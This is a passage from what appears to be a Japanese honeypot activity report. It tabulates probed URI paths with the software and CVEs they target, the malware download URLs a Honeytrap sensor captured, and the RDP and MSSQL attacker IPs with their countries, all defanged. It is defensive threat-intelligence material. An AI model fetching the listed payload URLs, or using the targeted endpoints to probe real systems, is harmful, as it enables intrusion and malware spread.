/ws/v1/cluster/apps/new-application Hadoop YARN ResourceManager - 7 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 5 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 4 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 4 件
/api api - 3 件
/admin/assets/js/views/login[.]js FreePBX - 3 件
/server-info Apache - 3 件
/shell MVPower DVR - 3 件
SERVER - - 2 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 2 件
/setup/eureka_info Google Home Hub - 2 件
/_search Elasticsearch - 2 件
/_ping New - 2 件
/status - 2020/2/15 1 件
/v1[.]16/version - - 1 件
/info - - 1 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/jars Unknown - 1 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
hxxp://160[.]16[.]145[.]183:49152/upnp/c
ontrol/basicevent1
 Unauthorized relay - 1 件
/manager/html Tomcat - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/v1[.]40/containers/json New - 1 件
/TP/public/index[.]php - - 1 件
/users - - 1 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 1 件
/cgi-bin/nobody/ CGI - 1 件
/admin-scripts[.]asp Administrator - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 36 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/boaform/admin/formPing Administrator - 3 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/favicon[.]ico favicon - 1 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 1 件
/solr/admin/info/system Apache Solr - 1 件
/index[.]php - - 1 件
/TP/public/index[.]php - - 1 件
/portal/redlion Unknown - 1 件
/YVMa New - 1 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 1 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 3 件
/index[.]php - - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 623077 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 10 件
hxxp://51[.]178[.]81[.]75/mips 8 件
hxxp://19ce033f[.]ngrok[.]io/arm7 4 件
hxxp://92[.]222[.]70[.]178/SBIDIOT/mips 3 件
hxxp://192[.]3[.]45[.]185/arm7 2 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 2 件
hxxp://66[.]42[.]87[.]9/adb3 2 件
hxxp://174[.]128[.]228[.]101/yakuza[.]mips 1 件
hxxp://51[.]222[.]0[.]40/bins/mpsl 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 1 件
hxxp://164[.]132[.]92[.]180/xtc[.]arm7 1 件
hxxp://irc[.]hoaxcalls[.]pw/arm7 1 件
hxxp://176[.]123[.]3[.]96/arm7 1 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 1 件
hxxp://188[.]209[.]49[.]244/test[.]sh 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3391 209[.]45[.]61[.]241 Peru 173 件 Link
3390 209[.]45[.]61[.]241 Peru 172 件 Link
47262 185[.]202[.]2[.]120 France 5 件 Link
19891 185[.]202[.]1[.]19 France 4 件 Link
24390 185[.]202[.]1[.]19 France 4 件 Link
23916 185[.]202[.]1[.]19 France 4 件 Link
24373 185[.]202[.]1[.]19 France 4 件 Link
17499 185[.]202[.]1[.]19 France 4 件 Link
23175 185[.]202[.]1[.]19 France 4 件 Link
18490 185[.]202[.]1[.]19 France 4 件 Link
18256 185[.]202[.]1[.]19 France 4 件 Link
18851 185[.]202[.]1[.]19 France 4 件 Link
24857 185[.]202[.]1[.]19 France 4 件 Link
19729 185[.]202[.]1[.]19 France 4 件 Link
19240 185[.]202[.]1[.]19 France 4 件 Link
24982 185[.]202[.]1[.]19 France 4 件 Link
22874 185[.]202[.]1[.]19 France 4 件 Link
23322 185[.]202[.]1[.]19 France 4 件 Link
23505 185[.]202[.]1[.]19 France 4 件 Link
18026 185[.]202[.]1[.]19 France 4 件 Link

Port

Port Count
3390 179 件
3391 178 件
3389 42 件
25251 8 件
23823 6 件
17854 6 件
24600 6 件
24724 6 件
23845 5 件
23669 5 件
23694 5 件
17518 5 件
24247 5 件
19890 5 件
24498 5 件
18582 5 件
18815 5 件
18056 5 件
22998 5 件
18403 5 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 11644 件 Link
194[.]61[.]26[.]5 Netherlands 1832 件 Link
185[.]202[.]2[.]120 France 1004 件 Link
185[.]202[.]1[.]10 France 797 件 Link
209[.]45[.]61[.]241 Peru 345 件 Link
5[.]101[.]64[.]77 Russia 94 件 Link
185[.]153[.]199[.]12 Russia 52 件 Link
185[.]202[.]2[.]149 France 29 件 Link
194[.]0[.]206[.]5 Ukraine 22 件 Link
194[.]28[.]112[.]49 Netherlands 20 件 Link
185[.]202[.]1[.]248 France 20 件 Link
185[.]176[.]221[.]207 Latvia 18 件 Link
185[.]202[.]1[.]36 France 16 件 Link
185[.]202[.]0[.]25 United Kingdom 15 件 Link
185[.]202[.]0[.]27 United Kingdom 13 件 Link
185[.]202[.]1[.]249 France 13 件 Link
163[.]172[.]68[.]20 United Kingdom 5 件 Link
185[.]202[.]1[.]20 France 5 件 Link
185[.]202[.]1[.]122 France 5 件 Link
185[.]202[.]2[.]243 France 4 件 Link

Port 1433

IP Country Count AbuseIPDB
103[.]107[.]188[.]174 China 54545 件 Link
118[.]69[.]40[.]251 Vietnam 50209 件 Link
80[.]251[.]145[.]16 Russia 46026 件 Link
180[.]166[.]90[.]181 China 40891 件 Link
117[.]25[.]182[.]50 China 37388 件 Link
78[.]186[.]173[.]61 Turkey 36104 件 Link
148[.]244[.]240[.]231 Mexico 34086 件 Link
14[.]175[.]167[.]143 Vietnam 32212 件 Link
85[.]100[.]124[.]175 Turkey 29789 件 Link
190[.]115[.]3[.]171 Guatemala 26811 件 Link
46[.]31[.]34[.]41 Poland 25943 件 Link
173[.]95[.]47[.]227 United States 21357 件 Link
212[.]77[.]151[.]229 Russia 20319 件 Link
80[.]69[.]180[.]108 Russia 19202 件 Link
93[.]81[.]205[.]42 Russia 18471 件 Link
109[.]69[.]30[.]140 Russia 18171 件 Link
179[.]157[.]67[.]122 Brazil 16457 件 Link
112[.]8[.]251[.]198 China 12819 件 Link
113[.]245[.]53[.]242 China 12562 件 Link
116[.]105[.]140[.]122 Vietnam 11969 件 Link